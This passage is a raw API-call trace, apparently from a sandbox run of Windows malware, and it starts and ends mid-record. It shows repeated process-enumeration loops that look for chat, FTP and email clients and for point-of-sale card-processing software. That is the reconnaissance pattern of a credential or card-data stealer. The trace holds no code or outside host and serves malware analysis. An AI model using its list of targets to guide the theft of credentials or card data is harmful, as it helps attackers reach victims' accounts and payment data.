cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0282.928] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0282.930] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0282.932] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0282.981] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0282.983] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0282.985] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0282.987] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0282.988] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0282.990] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0282.992] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0282.994] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0282.998] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0283.000] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0283.001] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0283.003] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0283.005] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0283.006] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0283.008] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0283.010] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0283.014] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0283.016] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0283.017] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0283.019] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0283.020] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0283.022] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0283.024] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0283.025] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0283.047] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0283.048] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0283.050] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.052] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0283.053] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0283.055] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0283.056] CloseHandle (hObject=0x21f8) returned 1 [0283.056] Sleep (dwMilliseconds=0x64) [0283.201] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0283.212] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.213] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0283.217] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0283.219] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.220] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0283.222] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.224] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0283.225] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0283.227] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0283.228] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.233] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.234] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0283.235] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.237] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.238] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.240] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.242] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.243] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.286] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.289] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0283.291] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0283.296] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0283.298] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.300] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0283.302] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0283.303] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0283.305] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0283.306] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0283.311] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.312] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0283.314] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0283.315] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.317] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0283.318] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0283.320] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0283.321] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0283.405] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0283.407] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0283.408] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0283.410] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0283.412] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0283.413] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0283.415] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0283.416] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0283.421] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0283.422] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0283.424] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0283.426] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0283.427] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0283.429] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 